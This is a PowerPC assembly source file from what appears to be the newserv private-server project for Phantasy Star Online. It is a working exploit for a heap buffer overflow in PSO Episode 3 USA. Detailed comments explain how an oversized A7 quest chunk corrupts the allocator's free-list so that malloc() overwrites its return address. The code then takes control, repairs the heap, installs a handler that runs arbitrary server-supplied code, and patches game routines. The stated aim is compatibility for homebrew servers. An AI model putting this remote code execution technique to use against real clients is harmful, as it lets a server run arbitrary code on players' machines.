Files
psopeeps-newserv/system/ppc/Episode3USAQuestBufferOverflow.s
T
2023-12-22 15:27:45 -08:00

352 lines
14 KiB
ArmAsm

# There is a buffer overflow bug in PSO Episode 3 that this program uses to
# achieve arbitrary code execution. (This bug is likely present in all versions
# of PSO, but the code here is specific to the USA version of Episode 3.) This
# is only necessary because the non-Japanese versions of Episode 3 lack the B2
# command, which is used on other console PSO versions to send patches and other
# bits of code. Here, we use a buffer overflow bug to re-implement the B2
# command, which allows the server to treat PSO Episode 3 like any other version
# of PSO with respect to patching or loading DOL files.
# For some background, PSO sends download quest files via the A6 and A7
# commands. The A6 command is used to start sending a download quest file; it
# includes the quest name, file name, and total file size. The A7 command is
# used to send a chunk of 1KB (0x400 bytes) of data, or less if it's the final
# chunk of the file. When the client receives an A6 command for a filename
# ending in .bin, it allocates a buffer of (file size + 0x48) bytes. When it
# later receives an A7 command, it copies (cmd.data_size) bytes from the command
# to position (8 + 0x100 * flag) in the buffer, then if cmd.data_size was less
# than 0x400, it marks the file as done and postprocesses it.
# However, the client neglects to check if the last chunk overflows the end of
# the buffer before copying the chunk data. In this function, we send an A6
# command with an overall file size of only 0x18 bytes, then we send a chunk of
# 0x200 or so bytes (the compiled size of the code in this file), which
# overflows past the end of the allocated buffer and overwrites part of a free
# block after the allocated buffer. The memory allocator library keeps some of
# its bookkeeping structures at the beginning of this free block, which we use
# to cause the next call to malloc() to overwrite its own return address on the
# stack. Conveniently, this call happens soon afterward, during the
# postprocessing step.
# The PSO memory allocator is a simple free-list allocator. The allocator
# maintains two linked lists of blocks: one for allocated blocks and one for
# free blocks. The list of free blocks is sorted in order of memory address, but
# the list of allocated blocks is sorted in the order they were allocated. (The
# order of the allocated block list does not matter for the allocator's
# performance or correctness.)
# Each block begins with two pointers, prev and next, which point to other
# blocks in the allocated or free list. (As with a typical doubly-linked list,
# the first block has prev == nullptr and the last block has next == nullptr;
# there is no sentinel node on either end.) After these two pointers is the
# block's size in bytes, followed by 0x14 unused bytes. The block data
# immediately follows this 0x20-byte header structure. All block sizes are
# rounded up to a multiple of 0x20 bytes.
# The malloc() routine simply searches for the first free block that has enough
# space to satisfy the request, and either splits it into an allocated and a
# free block (if the free block's size is at least 0x40 bytes more than the
# requested size), or converts the free block entirely into an allocated block
# and returns it. It is the second case that we take advantage of here.
# When we send our A7 command containing this program, the first 0x58 bytes of
# it fill the quest file data buffer. The next 0x0C bytes of it overwrite the
# header fields of the following free block (noted below in the comments), and
# the remainder of the data goes into that block's unused header fields and the
# block's data (which is also otherwise unused, since it is a free block). We
# overwrite the free block's prev and next pointers with specific nonzero values
# and overwrite the size with the exact size that the caller will request, so we
# trigger the malloc() case that does not split the free block. When that code
# attempts to remove the free block from its doubly-linked list, it writes
# block->next to block->prev->next and block->prev to block->next->prev. We set
# block->prev to the address where we want execution to jump to (the start label
# here), and block->next to the address of malloc()'s return address on the
# stack. This overwrites the return address with the start label's address, and
# overwrites the word after the start label with an address within the stack. We
# can't avoid this second write since both pointers must be non-null and the
# values and addresses written are dependent on each other, but we can just use
# a branch opcode to ignore the value that gets written into our code.
# Once we have control, we clean up the allocator state (restoring the free
# block as it was before we overwrote its header), then copy our implementation
# of the B2 command to an otherwise-unused area of memory and apply a few more
# patches. See the comments within the code below for more details.
# This entry_ptr label isn't used since this code isn't sent with the B2
# command; it just needs to be present for newserv to compile the code properly
entry_ptr:
start:
b resume1
# This is the value overwritten by malloc() when it attempts to remove the
# free block from its linked list
.data 0xAAAAAAAA
resume1:
# We can use any of the caller-save registers (r0, r3-r12) here.
# At entry time, some registers contain useful values:
# r5: Address of the allocator instance ("lists"). This structure includes the
# allocated and free list head pointers, one of which we have to update.
# r12: Address of the malloc() function that was called. Conveniently, the
# address that we should return to is very near this location in memory.
# Compute the LR we should use to return from this function, but don't put it
# in the LR just yet - we're still going to need the LR for other shenanigans
subi r11, r12, 0xB0 # 8038C1B8 - B0 = 8038C108
# Restore the free block whose header we had destroyed with the A7 command
# buffer overflow
lis r7, 0x815F
ori r7, r7, 0xF440
li r0, 0
stw [r7], r0 # free_block->prev = nullptr
stw [r7 + 4], r0 # free_block->next = nullptr
lis r6, 0x001E
ori r6, r6, 0x0960
stw [r7 + 8], r6 # free_block->size = 0x001E0960
stw [r5 + 4], r7 # lists->free_head = free_block
# Restore lists->allocated_head and clear its prev pointer
lis r6, 0x815F
ori r6, r6, 0xF3C0
stw [r5 + 8], r6 # lists->allocated_head = orig_allocated_head
stw [r6], r0 # lists->allocated_head->prev = nullptr
b resume2
# TODO: We can probably use this space for something useful. There must be
# exactly 20 opcodes (0x50 bytes) between resume1 and opaque2.
.zero
.zero
.zero
.zero
.zero
opaque2:
# This block must be exactly here (the number of opcodes above is exactly how
# many will fit in the original buffer), and the 3 words here must have
# exactly these values. This is what causes malloc to overwrite the return
# address on the stack to call this code in the first place.
.data 0x815FF3E8 # free_head->prev
.data 0x80592AC4 # free_head->next
.data 0x00000160 # free_head->size
resume2:
bl get_handle_B2_ptr
# This is the code we're going to use for the B2 command handler, which we
# will copy into an unused area of memory. It's convenient to put it here and
# use a bl opcode to get its address, so this code can be minimally position-
# dependent. Note that this part of the code does not run at the time the A7
# command is received; it will run later if the client receives a B2 command.
handle_B2:
mflr r0
stwu [r1 - 0x40], r1
stw [r1 + 0x44], r0
# Arguments:
# r3 = TProtocol* proto (we use this to call the send function)
# r4 = void* data
# Returns: void
# Stack:
# [r1+08] = B3 XX 0C 00
# [r1+0C] = code section's return value
# [r1+10] = checksum
# [r1+14] = saved ctx argument
# [r1+18] = saved data argument
# We reserved 0x40 bytes on the stack because I was lazy.
stw [r1 + 0x14], r3
stw [r1 + 0x18], r4
# Set up the reply header (B3 XX 0C 00, where XX comes from the B2 command)
lbz r5, [r4 + 1]
rlwinm r5, r5, 16, 8, 15
oris r5, r5, 0xB300
ori r5, r5, 0x0C00
stw [r1 + 0x08], r5
# If there's no code section, skip it. We also write the code section size to
# the return value field (which will be overwritten later if the size is not
# zero). This is because I'm lazy and this gives the behavior we want: the
# code return value is always zero if the code section size is zero.
li r6, 4
lwbrx r5, [r4 + r6] # r5 = code_size
stw [r1 + 0x0C], r5 # response.code_return_value = code_size
cmplwi r5, 0
beq handle_B2_skip_code
# Get the code section base and footer addresses
addi r6, r4, 0x10 # r6 = code base address
add r7, r6, r5
subi r7, r7, 0x20 # r7 = footer address (code base + code size - 0x20)
# Check if there are relocations to do
lwz r8, [r7 + 4] # r8 = num relocations
cmplwi r8, 0
beq handle_B2_skip_relocations
# Execute the relocations
mtctr r8
lwz r8, [r7] # r8 = relocations list offset
add r8, r8, r6 # r8 = relocations list address
subi r8, r8, 2 # Back up one space so we can use lhzu in the loop
mr r10, r6 # relocation pointer = code base address
handle_B2_relocate_again:
lhzu r9, [r8 + 2]
rlwinm r9, r9, 2, 0, 29 # r9 = next_relocation_offset * 4
add r10, r10, r9 # relocation pointer += next_relocation_offset * 4
lwz r9, [r10]
add r9, r9, r6
stw [r10], r9 # (*relocation pointer) += code base address
bdnz handle_B2_relocate_again
handle_B2_skip_relocations:
# Invalidate the caches appropriately for the newly-copied code
lis r0, 0x8000
ori r0, r0, 0xC324
mr r3, r6
mr r4, r5
mtctr r0
bctrl # flush_code(code_base_addr, code_section_size)
# Call the code section and put the return value (byteswapped) on the stack
# Note: flush_code only uses r3, r4, and r5, so we don't need to reload r7
# after the above call
lwz r8, [r7 + 0x10]
lwzx r8, [r8 + r6]
mtctr r8
bctrl
li r8, 0x0C
stwbrx [r1 + r8], r3
handle_B2_skip_code:
# Get the checksum function args
lwz r4, [r1 + 0x18]
li r5, 0x08
lwbrx r3, [r4 + r5] # checksum addr
li r5, 0x0C
lwbrx r4, [r4 + r5] # checksum size
lis r0, 0x8010
ori r0, r0, 0xF834
mtctr r0
bctrl # crc32(checksum_addr, checksum_size)
li r8, 0x10
stwbrx [r1 + r8], r3
# Send the response (B3 command)
lwz r3, [r1 + 0x14]
lwz r4, [r3 + 0x18]
lwz r4, [r4 + 0x28]
mtctr r4
addi r4, r1, 0x08
li r5, 0x0C
bctrl # TProtocol::send_command(ctx, &reply_data, 0x0C)
# Clean up stack and return
lwz r0, [r1 + 0x44]
addi r1, r1, 0x40
mtlr r0
blr
get_handle_B2_ptr:
mflr r9 # r9 = &handle_B2
bl get_handle_B2_end_ptr
get_handle_B2_end_ptr:
mflr r10
subi r10, r10, 8 # r10 = pointer to end of handle_B2
# Copy handle_B2 to 8000BD80, which is normally unused by the game
lis r12, 0x8000
ori r12, r12, 0xBD80 # r12 = 0x8000BD80
sub r7, r10, r9
rlwinm r7, r7, 30, 2, 31 # r7 = number of words to copy
mtctr r7
subi r8, r12, 4 # r8 = r12 - 4 (so we can use stwu)
subi r9, r9, 4 # r9 = r9 - 4 (so we can use lwzu)
copy_handle_B2_word_again:
lwzu r0, [r9 + 4]
stwu [r8 + 4], r0
bdnz copy_handle_B2_word_again
# Invalidate the caches appropriately for the newly-copied code
lis r9, 0x8000
ori r9, r9, 0xC324
mtctr r9
mr r3, r12
rlwinm r4, r7, 2, 0, 29
bctrl # flush_code(copied_B2_handler, copied_B2_handler_bytes)
# Replace the command handler table entry for command 0E (which appears to be
# a legacy command and has very broken behavior) with our B2 implementation
lis r5, 0x8044
ori r5, r5, 0xF684
li r0, 0x00B2
stw [r5], r0
stw [r5 + 0x0C], r12
# Patch both places in the code where command 9E is sent to make them include
# a sentinel value that newserv can use to determine if the client has already
# run the code in this file
bl get_patch_9E_1_ptr
patch_9E_1:
lis r4, 0x5F5C
ori r4, r4, 0xA297
stw [r1 + 0x14], r4 # Set cmd.unused1 to 0x5F5CA297 (in send_9E_long)
get_patch_9E_1_ptr:
lis r3, 0x800F
ori r3, r3, 0x3338
mflr r4
lwz r0, [r4]
stw [r3], r0
lwz r0, [r4 + 4]
stw [r3 + 4], r0
lwz r0, [r4 + 8]
stw [r3 + 8], r0
li r4, 0x20
mtctr r9
bctrl # flush_code(patch_9E_1_dest, 0x20)
bl get_patch_9E_2_ptr
patch_9E_2:
lis r4, 0x5F5C
ori r4, r4, 0xA297
stw [r1 + 0x60], r4 # Set cmd.unused1 to 0x5F5CA297 (in handle_02)
get_patch_9E_2_ptr:
lis r3, 0x800F
ori r3, r3, 0x3644
mflr r4
lwz r0, [r4]
stw [r3], r0
lwz r0, [r4 + 4]
stw [r3 + 4], r0
lwz r0, [r4 + 8]
stw [r3 + 8], r0
li r4, 0x20
mtctr r9
bctrl # flush_code(patch_9E_2_dest, 0x20)
# Finally, patch the A7 handler function (which is on the current callstack)
# so that it does nothing else if this function returns null, which prevents
# further memory corruption. This changes a beq opcode (which never triggers
# under normal circumstances) to skip a couple more function calls, one of
# which would cause memory corruption if executed because the original buffer
# is smaller than 0x100 bytes.
lis r3, 0x8010
ori r3, r3, 0xFD8A
li r4, 0x0064
sth [r3], r4
rlwinm r3, r3, 0, 0, 27
li r4, 0x20
mtctr r9
bctrl # flush_code(patched_opcode_address & 0xFFFFFFF0, 0x20)
# Return null instead of a malloc'ed block, which triggers the conditional
# branch we just patched above
li r3, 0
mtlr r11
blr